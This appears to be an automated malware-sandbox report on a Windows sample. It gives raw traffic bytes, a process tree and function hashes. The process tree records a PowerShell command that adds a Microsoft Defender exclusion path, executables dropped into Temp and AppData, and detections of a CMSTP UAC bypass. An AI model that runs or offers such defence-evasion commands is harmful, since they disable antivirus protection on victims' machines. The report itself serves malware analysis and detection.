2024-12-05 10:40:20 UTC	16384	IN	Data Raw: ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 10 2b 32 ff 0c a6 d6 ff 0b b9 ef ff 0b b9 ef ff 0b b9 ef ff 0b b9 ef ff 0c a6 d6 ff 10 2b 32 ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e Data Ascii: +2+2
2024-12-05 10:40:20 UTC	1024	IN	Data Raw: ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 10 1f 21 ff 0f 9a c4 ff 0f bb f0 ff 0f bb f0 ff 0f bb f0 ff 0f bb f0 ff 0f bb f0 ff 0f bb f0 ff 0f bb f0 ff 0f bb f0 ff 0f bb f0 ff 0f bb f0 ff 0f bb f0 ff 0f bb f0 ff 0f bb f0 ff 0f bb f0 ff 0f bb f0 ff 0f bb f0 ff 0f bb f0 ff 0f bb f0 ff 0f bb f0 ff 0f bb f0 ff 0f bb f0 ff 0f bb f0 ff 0f bb f0 ff 0f bb f0 ff 0f bb f0 ff 0f bb f0 ff 0f bb f0 ff 0f bb f0 ff 0f bb f0 ff 0f bb f0 ff 0f bb f0 ff 0f bb f0 ff 0f bb f0 ff 0f bb f0 ff 0f bb f0 ff 0f bb f0 ff 0f a8 d7 ff 10 2c 33 ff 11 0e 0b ff 11 0e 0b ff 11 0e Data Ascii: !,3

Target ID:	0
Start time:	05:39:51
Start date:	05/12/2024
Path:	C:\Users\user\Desktop\MiJZ3z4t5K.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\MiJZ3z4t5K.exe"
Imagebase:	0xd70000
File size:	307'736 bytes
MD5 hash:	7184EE339FC221D742067DCCFF4CDFE2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	1
Start time:	05:39:52
Start date:	05/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'"
Imagebase:	0xc0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	05:39:52
Start date:	05/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	05:39:53
Start date:	05/12/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff717f30000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	05:40:15
Start date:	05/12/2024
Path:	C:\Windows\Temp\AppsLo.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Temp\AppsLo.exe"
Imagebase:	0x8a0000
File size:	10'750'445 bytes
MD5 hash:	B0AD260D058A7F4F299B4BBC7F876799
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 47%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	05:40:15
Start date:	05/12/2024
Path:	C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe" -burn.clean.room="C:\Windows\Temp\AppsLo.exe" -burn.filehandle.attached=524 -burn.filehandle.self=532
Imagebase:	0xf50000
File size:	10'636'628 bytes
MD5 hash:	5DEBD32329500518D4F21225DCB64E43
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 12%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	05:40:16
Start date:	05/12/2024
Path:	C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\thunderbird.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\thunderbird.exe"
Imagebase:	0x400000
File size:	8'504'936 bytes
MD5 hash:	A9D830B99ABEA315C465A440C4AA1B94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000008.00000002.2459567914.0000000003EA5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	05:40:28
Start date:	05/12/2024
Path:	C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe
Imagebase:	0x400000
File size:	8'504'936 bytes
MD5 hash:	A9D830B99ABEA315C465A440C4AA1B94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000009.00000002.2636199629.0000000003EC8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	05:40:40
Start date:	05/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\cmd.exe
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000B.00000002.2920093047.000000000536C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	05:40:40
Start date:	05/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	05:40:50
Start date:	05/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff7403e0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	16
Start time:	05:41:05
Start date:	05/12/2024
Path:	C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe"
Imagebase:	0x400000
File size:	8'504'936 bytes
MD5 hash:	A9D830B99ABEA315C465A440C4AA1B94
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000010.00000002.2989949247.0000000003EB7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	05:41:07
Start date:	05/12/2024
Path:	C:\Users\user\AppData\Local\Temp\Qjsync.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\Temp\Qjsync.exe
Imagebase:	0x140000000
File size:	2'364'728 bytes
MD5 hash:	967F4470627F823F4D7981E511C9824F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000011.00000002.3021047369.00000000026A0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 0%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	05:41:16
Start date:	05/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\cmd.exe
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000012.00000002.3047889752.0000000003220000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000012.00000002.3048517173.00000000051BD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	05:41:16
Start date:	05/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	05:41:27
Start date:	05/12/2024
Path:	C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe"
Imagebase:	0x400000
File size:	8'504'936 bytes
MD5 hash:	A9D830B99ABEA315C465A440C4AA1B94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000017.00000002.3220573413.0000000003E5B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	05:41:39
Start date:	05/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\cmd.exe
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000018.00000002.3341449568.00000000050B5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	25
Start time:	05:41:39
Start date:	05/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Function 014624CD Relevance: .5, Instructions: 488COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3341494105.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1460000_MiJZ3z4t5K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02ca3f110a52b3e238051b38a318749180da673508e6bf82878288b496cbc7d7
Instruction ID: ae8365ae73df1d02d7af6767fefff07af71e023d93895089019d8e85901afae5
Opcode Fuzzy Hash: 02ca3f110a52b3e238051b38a318749180da673508e6bf82878288b496cbc7d7
Instruction Fuzzy Hash: F201B132C1534AAACB119BB9DC448DDBBB5EFCB304F550A56E100B7061E770254AC791

Function 01460E80 Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3341494105.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1460000_MiJZ3z4t5K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7672c1927b5a5cdf3faf85053a6ec954eee04ca2023e49a587b001156216ee1d
Instruction ID: b798b9aa39a3cfde68399d813ab6afacbd39af007082e7321bcc188ca64dfb8e
Opcode Fuzzy Hash: 7672c1927b5a5cdf3faf85053a6ec954eee04ca2023e49a587b001156216ee1d
Instruction Fuzzy Hash: EB613870A002458FCB15DF69C484A9EBBF6AF89314F2585AAE405AB372CB719C46CF91

Function 01462950 Relevance: .1, Instructions: 144COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3341494105.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1460000_MiJZ3z4t5K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a8cfbbdd99b25aa798f51f249414f0c6987f9a70065140636a1bc281b1ab388
Instruction ID: c199e3fc4aa976ca7934402bcb0e23c1b8e9971fd97e1bd1b7349128cfbaafcf
Opcode Fuzzy Hash: 2a8cfbbdd99b25aa798f51f249414f0c6987f9a70065140636a1bc281b1ab388
Instruction Fuzzy Hash: 4D515B70A0020A9FDB15DF69C444ADDBBF6BF89314F288199E404BB361DBB09D85CFA1

Function 01460B70 Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3341494105.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1460000_MiJZ3z4t5K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bb48744e5934b27a9c28caf6d663428ef5d91f85156b826f663c52ea6ffaccf
Instruction ID: 9d99d9deacfa74147ff30bd9aad5ebbc91631c5bd0a8cae519817e965860d62d
Opcode Fuzzy Hash: 5bb48744e5934b27a9c28caf6d663428ef5d91f85156b826f663c52ea6ffaccf
Instruction Fuzzy Hash: AA417E719007598FDF25CF68C844A8EBBF5BF88300F144A5AE4D6AB3A5D734A845CB61

Function 01461D09 Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3341494105.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1460000_MiJZ3z4t5K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 624d9cb7a74380169d0aff5aed24819bc895bad30b93c708471228572b82eca2
Instruction ID: f1a6e59d32af97f71706dc358a459e7bb402ee6bce18fc599c8018bb9cf6aced
Opcode Fuzzy Hash: 624d9cb7a74380169d0aff5aed24819bc895bad30b93c708471228572b82eca2
Instruction Fuzzy Hash: 7331D135A042089FCF11EFA8D9405DEBBF5EF99714F14826BD842A7312DB30A946CB91

Function 01462B7C Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3341494105.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1460000_MiJZ3z4t5K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62a744a57f089fab5ecc3df352970e3c0698f78c6875969f73938c0b8a57e7f6
Instruction ID: b89265821c5ad0335fa2c9f3f6599101051f2d3e7e3e12521287487a2e04fe33
Opcode Fuzzy Hash: 62a744a57f089fab5ecc3df352970e3c0698f78c6875969f73938c0b8a57e7f6
Instruction Fuzzy Hash: 703157B0D01249AFDB14CFA9C580ADEBFF5BF48744F24806AE909AB364DB749941CF91

Function 01462B88 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3341494105.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1460000_MiJZ3z4t5K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a02dbee9814e91553896578fdc39ed182c862fd95aab23a52f28ad02509470b
Instruction ID: 7742094602c122c6f9a3ddb4dfc59f19e517b4c97ba1b9b260ae359b1fe80398
Opcode Fuzzy Hash: 9a02dbee9814e91553896578fdc39ed182c862fd95aab23a52f28ad02509470b
Instruction Fuzzy Hash: C53139B0D01249AFDB14CFA9C580ADEBFF5BF48750F24842AE909AB354DB749941CF91

Function 01461D18 Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3341494105.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1460000_MiJZ3z4t5K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0481c8f309e3881c38bd88091d8e801477737960f2a1233b2c70cdc9eb963502
Instruction ID: 6e3228f82ee20244b07aa29c846f9590d305f2c08b462246a45bdc9e31bc31ea
Opcode Fuzzy Hash: 0481c8f309e3881c38bd88091d8e801477737960f2a1233b2c70cdc9eb963502
Instruction Fuzzy Hash: 72219F35A042099FCF15EFA8C94099EBBF6AF89710F14862BD846A7301DB30AD45CBA1

Function 01460980 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3341494105.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1460000_MiJZ3z4t5K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cfa00cf81156bb6841e45b4171687a3a3275ee904148867d0200379b143020a
Instruction ID: 98bc0cce6d68ae9a044f162bcea4c256d6f272c429cea3c205732850e1de1c56
Opcode Fuzzy Hash: 6cfa00cf81156bb6841e45b4171687a3a3275ee904148867d0200379b143020a
Instruction Fuzzy Hash: 6621CF719053859FDB22CF78C8005CEBFF5BF89244F1406AAE4C5E72A2C730A849CB51

Function 01460B61 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3341494105.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1460000_MiJZ3z4t5K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a2a911f8564162cf8f868c915e6cc6662a5574bbace11764fbf2aef358cb9f9
Instruction ID: 9406f732e3f4229d82c65175e9e238c7a0152e4c85bf7afe6698bfcdc8a77b9e
Opcode Fuzzy Hash: 8a2a911f8564162cf8f868c915e6cc6662a5574bbace11764fbf2aef358cb9f9
Instruction Fuzzy Hash: 4A11AC35A003558FDB26CF6CC8005DEBBF5BF89300B0506AAE481A7265C730A915CBA2

Function 01460D70 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3341494105.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1460000_MiJZ3z4t5K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3bf2180802894a054f5d2f9dd98868b76f951373d7afae5276bf83f27c2b5e20
Instruction ID: 06676b0fdd68c1fe4ca6d9816bb2030dc199c3f4db62fab53a6bace49c81e328
Opcode Fuzzy Hash: 3bf2180802894a054f5d2f9dd98868b76f951373d7afae5276bf83f27c2b5e20
Instruction Fuzzy Hash: C7019231C1978A9BCB029BB5DC408DDBFB1EEC7310F560692D100B7061E670258EC751

Function 0137D7F1 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3339643280.000000000137D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0137D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_137d000_MiJZ3z4t5K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ec0c67097dec80c1ec2c7b17dd2a4e9d48e4147ff75ca9f36caafd14549df36
Instruction ID: b15ff9fb265ea03ded8eb18b58d6973b34a2dd97711f86d8705a31f8bf63a324
Opcode Fuzzy Hash: 9ec0c67097dec80c1ec2c7b17dd2a4e9d48e4147ff75ca9f36caafd14549df36
Instruction Fuzzy Hash: D101A771404348AAF7304E99CD84B66BF98EF41768F18C46AEE0D5A693C67D9444C6B1

Function 01460879 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3341494105.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1460000_MiJZ3z4t5K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92e4106af7a50ca92c06b847b67ece74c59cac268ad2039babdecd4a8cf9a943
Instruction ID: f8d1404dcb36e0b99771d77cfe58901e4b385d64febfce6f26b895d1b0e848a2
Opcode Fuzzy Hash: 92e4106af7a50ca92c06b847b67ece74c59cac268ad2039babdecd4a8cf9a943
Instruction Fuzzy Hash: 9001BC72C0574E9ACF119BB8CC004EEBF76AFCA320F590752D200771A1E770228ACBA1

Function 01460A59 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3341494105.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1460000_MiJZ3z4t5K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84e66e63bee2164e7918ca3af31256f3bd6347ef81955a8466687b6ef96893df
Instruction ID: 6aa0503ca8600b34aa48c1a1dab3b34aeb4450cd79d3026210d3065a4125e67c
Opcode Fuzzy Hash: 84e66e63bee2164e7918ca3af31256f3bd6347ef81955a8466687b6ef96893df
Instruction Fuzzy Hash: 72018F32C0578A9ACB129BB5DC004EDBFB6AEC7320F5A4756D2007B061E770218ACBA1

Function 01460CC9 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3341494105.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1460000_MiJZ3z4t5K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 692fe33f1f78621b899eccceedfc1968c19b53811a2a76c94922d49128df60f1
Instruction ID: 85fe497a368b1cfea068231074e16bcb53b49f22c977845c9ae79f26b7b24778
Opcode Fuzzy Hash: 692fe33f1f78621b899eccceedfc1968c19b53811a2a76c94922d49128df60f1
Instruction Fuzzy Hash: D4117030504246CFDB15DB68D4447AE7BB1AF5130CF20459DD1055F262CBBAA847CB92

Function 01460AD8 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3341494105.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1460000_MiJZ3z4t5K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8551190479619894521b7fdd7458088e440b03c31bc139486bcc7770542202b5
Instruction ID: db9cc50d66bf1a662b4f0d9bf0d9e618ed5936da257fab54b22ce2133fec14a9
Opcode Fuzzy Hash: 8551190479619894521b7fdd7458088e440b03c31bc139486bcc7770542202b5
Instruction Fuzzy Hash: 5AF02832D11385ABEB129BB4C4145DFBFB94F41304F14C47AE502BB241DE70590A8781

Function 01460DF9 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3341494105.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1460000_MiJZ3z4t5K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2076983e0777090b79f5e08a86ce88860f2133b1e29d6c277d6a1ff271506632
Instruction ID: a3eaf67defa4c81dddef094a33bdb5dc44374101d26f08f1136921489cad1e88
Opcode Fuzzy Hash: 2076983e0777090b79f5e08a86ce88860f2133b1e29d6c277d6a1ff271506632
Instruction Fuzzy Hash: 4EF0C272E2121A9BDF14DB74C8659EFBBB69F94310F10492AE042AB250DE704906C7D1

Function 014628C9 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3341494105.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1460000_MiJZ3z4t5K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b725c7fd226a4dda0bf3a130edec8ca41a92ca1ac0c4ad0874af2567c728212
Instruction ID: 05f276230985dac8cc7e1258d3e238df60512c73dfd873d4cfbb3ef4b1f640a7
Opcode Fuzzy Hash: 9b725c7fd226a4dda0bf3a130edec8ca41a92ca1ac0c4ad0874af2567c728212
Instruction Fuzzy Hash: A1F04635E20309A7DB0497B4C4109AFBFFA9F84300F504827D406EB260DFF0550A83C2

Function 014608F9 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3341494105.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1460000_MiJZ3z4t5K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62a4ccbb4e6e93d0a0867427d96249f3ff520d563a93551060238acd8d93bc27
Instruction ID: bd92b4e1bec1a785782b294af31634f6c24a74d460f56a153ea5b334c217e7af
Opcode Fuzzy Hash: 62a4ccbb4e6e93d0a0867427d96249f3ff520d563a93551060238acd8d93bc27
Instruction Fuzzy Hash: 8AF02131D113499BDB059774C4545DFBFB69F84300F54456BE502E7340DE705906C3D2

Function 0137D7F0 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3339643280.000000000137D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0137D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_137d000_MiJZ3z4t5K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4868e9f5250342e71799b42ceb744f239683794b43f999c27948cc2776062c68
Instruction ID: a677fd2bffcf20c33a188dc7713c7f78cd753b619bad6fa498df7bc1352eac5a
Opcode Fuzzy Hash: 4868e9f5250342e71799b42ceb744f239683794b43f999c27948cc2776062c68
Instruction Fuzzy Hash: D0F06272405344AEE7218A5AD9C4B62FF98EF81738F18C45AEE0C4B287C27D9844CB71

Function 01460A68 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3341494105.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1460000_MiJZ3z4t5K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ae920983929ab852e0ec38d427114a8da2a1845e9982fb48221a367445f1810
